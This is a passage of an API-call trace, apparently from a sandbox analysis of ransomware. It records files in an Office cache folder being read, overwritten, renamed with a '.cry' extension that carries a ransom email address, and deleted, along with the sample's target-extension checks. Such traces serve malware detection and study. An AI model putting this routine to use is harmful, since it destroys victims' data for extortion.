(in: hFile=0x1ec, lpBuffer=0x39d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x39d0058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.069] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.069] WriteFile (in: hFile=0x1ec, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x2d9fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0044.085] SetEndOfFile (hFile=0x1ec) returned 1 [0044.085] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fd40b0 [0044.088] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.088] WriteFile (in: hFile=0x1ec, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.090] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.090] WriteFile (in: hFile=0x1ec, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.271] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.271] WriteFile (in: hFile=0x1ec, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.322] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fd40b0 | out: hHeap=0x600000) returned 1 [0044.334] CloseHandle (hObject=0x1ec) returned 1 [0044.334] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0044.335] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0044.335] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0044.335] lstrlenW (lpString=".doc") returned 4 [0044.335] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.335] lstrlenW (lpString=".docx") returned 5 [0044.335] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0044.335] lstrlenW (lpString=".pdf") returned 4 [0044.335] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.335] lstrlenW (lpString=".xls") returned 4 [0044.335] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.335] lstrlenW (lpString=".xlsx") returned 5 [0044.335] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0044.335] lstrlenW (lpString=".ppt") returned 4 [0044.335] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.335] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0044.335] lstrlenW (lpString=".zip") returned 4 [0044.335] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.335] lstrlenW (lpString=".rar") returned 4 [0044.335] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.335] lstrlenW (lpString=".bz2") returned 4 [0044.335] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.335] lstrlenW (lpString=".7z") returned 3 [0044.335] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.335] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0044.335] lstrlenW (lpString=".dbf") returned 4 [0044.335] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.335] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0044.335] lstrlenW (lpString=".1cd") returned 4 [0044.335] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.335] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0044.335] lstrlenW (lpString=".jpg") returned 4 [0044.335] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.335] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0044.335] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0044.336] lstrlenW (lpString=".doc") returned 4 [0044.336] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.336] lstrlenW (lpString=".docx") returned 5 [0044.336] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0044.336] lstrlenW (lpString=".pdf") returned 4 [0044.336] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.336] lstrlenW (lpString=".xls") returned 4 [0044.336] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.336] lstrlenW (lpString=".xlsx") returned 5 [0044.336] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0044.336] lstrlenW (lpString=".ppt") returned 4 [0044.336] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0044.336] lstrlenW (lpString=".zip") returned 4 [0044.336] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.336] lstrlenW (lpString=".rar") returned 4 [0044.336] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.336] lstrlenW (lpString=".bz2") returned 4 [0044.336] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.336] lstrlenW (lpString=".7z") returned 3 [0044.336] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0044.336] lstrlenW (lpString=".dbf") returned 4 [0044.336] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0044.336] lstrlenW (lpString=".1cd") returned 4 [0044.336] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0044.336] lstrlenW (lpString=".jpg") returned 4 [0044.336] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.336] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0044.337] lstrlenW (lpString="ProjLR.cab") returned 10 [0044.337] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0044.454] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=8265165) returned 1 [0044.454] CloseHandle (hObject=0x1f4) returned 1 [0044.454] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab")) returned 0x2020 [0044.454] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.454] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0044.455] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0044.455] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0x0) returned 1 [0044.455] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.455] ReadFile (in: hFile=0x1f4, lpBuffer=0x3950058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3950058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.473] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x2a09ef, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.473] ReadFile (in: hFile=0x1f4, lpBuffer=0x3990058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3990058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.502] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.502] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x7a1dcd, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.502] ReadFile (in: hFile=0x1f4, lpBuffer=0x39d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x39d0058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.551] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.551] WriteFile (in: hFile=0x1f4, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x2d9fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0044.574] SetEndOfFile (hFile=0x1f4) returned 1 [0044.575] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0044.575] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.575] WriteFile (in: hFile=0x1f4, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.576] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x2a09ef, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.576] WriteFile (in: hFile=0x1f4, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.679] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x7a1dcd, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.679] WriteFile (in: hFile=0x1f4, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.681] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0044.683] CloseHandle (hObject=0x1f4) returned 1 [0044.683] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0044.683] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0044.683] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0044.683] lstrlenW (lpString=".doc") returned 4 [0044.683] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.683] lstrlenW (lpString=".docx") returned 5 [0044.683] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0044.684] lstrlenW (lpString=".pdf") returned 4 [0044.684] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.684] lstrlenW (lpString=".xls") returned 4 [0044.684] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.684] lstrlenW (lpString=".xlsx") returned 5 [0044.684] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0044.684] lstrlenW (lpString=".ppt") returned 4 [0044.684] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.684] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0044.684] lstrlenW (lpString=".zip") returned 4 [0044.684] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.684] lstrlenW (lpString=".rar") returned 4 [0044.684] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.684] lstrlenW (lpString=".bz2") returned 4 [0044.684] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.684] lstrlenW (lpString=".7z") returned 3 [0044.684] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.684] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0044.684] lstrlenW (lpString=".dbf") returned 4 [0044.684] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.684] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0044.684] lstrlenW (lpString=".1cd") returned 4 [0044.684] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.684] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0044.684] lstrlenW (lpString=".jpg") returned 4 [0044.684] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.684] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0044.684] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0044.684] lstrlenW (lpString=".doc") returned 4 [0044.684] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.684] lstrlenW (lpString=".docx") returned 5 [0044.684] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0044.684] lstrlenW (lpString=".pdf") returned 4 [0044.684] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.684] lstrlenW (lpString=".xls") returned 4 [0044.684] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.685] lstrlenW (lpString=".xlsx") returned 5 [0044.685] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0044.685] lstrlenW (lpString=".ppt") returned 4 [0044.685] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.685] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0044.685] lstrlenW (lpString=".zip") returned 4 [0044.685] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.685] lstrlenW (lpString=".rar") returned 4 [0044.685] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.685] lstrlenW (lpString=".bz2") returned 4 [0044.685] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.685] lstrlenW (lpString=".7z") returned 3 [0044.685] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.685] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0044.685] lstrlenW (lpString=".dbf") returned 4 [0044.685] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.685] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0044.685] lstrlenW (lpString=".1cd") returned 4 [0044.685] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.685] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0044.685] lstrlenW (lpString=".jpg") returned 4 [0044.685] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.685] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0044.685] lstrlenW (lpString="dwintl20.dll") returned 12 [0044.685] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0044.686] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=107912) returned 1 [0044.686] CloseHandle (hObject=0x1f4) returned 1 [0044.686] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll")) returned 0x2020 [0044.686] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.686] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0044.686] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.686] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.686] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0045.750] GetLastError () returned 0x0 [0045.750] ReadFile (in: hFile=0x1f4, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x1a588, lpOverlapped=0x0) returned 1 [0046.623] WriteFile (in: hFile=0x1c4, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x1a590, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x1a590, lpOverlapped=0x0) returned 1 [0046.625] ReadFile (in: hFile=0x1f4, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.625] WriteFile (in: hFile=0x1c4, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.625] SetEndOfFile (hFile=0x1c4) returned 1 [0046.625] CloseHandle (hObject=0x1c4) returned 1 [0046.625] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.625] SetEndOfFile (hFile=0x1f4) returned 1 [0046.627] CloseHandle (hObject=0x1f4) returned 1 [0046.627] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0046.627] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll")) returned 1 [0046.627] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.627] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.627] lstrlenW (lpString=".doc") returned 4 [0046.627] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.627] lstrlenW (lpString=".docx") returned 5 [0046.627] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0046.627] lstrlenW (lpString=".pdf") returned 4 [0046.627] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.627] lstrlenW (lpString=".xls") returned 4 [0046.627] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.627] lstrlenW (lpString=".xlsx") returned 5 [0046.627] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0046.627] lstrlenW (lpString=".ppt") returned 4 [0046.627] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.627] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.627] lstrlenW (lpString=".zip") returned 4 [0046.627] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.628] lstrlenW (lpString=".rar") returned 4 [0046.628] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.628] lstrlenW (lpString=".bz2") returned 4 [0046.628] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.628] lstrlenW (lpString=".7z") returned 3 [0046.628] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.628] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.628] lstrlenW (lpString=".dbf") returned 4 [0046.628] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.628] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.628] lstrlenW (lpString=".1cd") returned 4 [0046.628] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.628] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.628] lstrlenW (lpString=".jpg") returned 4 [0046.628] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.628] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.628] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.628] lstrlenW (lpString=".doc") returned 4 [0046.628] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.628] lstrlenW (lpString=".docx") returned 5 [0046.628] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0046.628] lstrlenW (lpString=".pdf") returned 4 [0046.628] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.628] lstrlenW (lpString=".xls") returned 4 [0046.628] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.628] lstrlenW (lpString=".xlsx") returned 5 [0046.628] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0046.628] lstrlenW (lpString=".ppt") returned 4 [0046.628] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.628] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.628] lstrlenW (lpString=".zip") returned 4 [0046.628] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.628] lstrlenW (lpString=".rar") returned 4 [0046.628] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.628] lstrlenW (lpString=".bz2") returned 4 [0046.628] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.628] lstrlenW (lpString=".7z") returned 3 [0046.628] lstrcmpiW (lpString1=".7z", 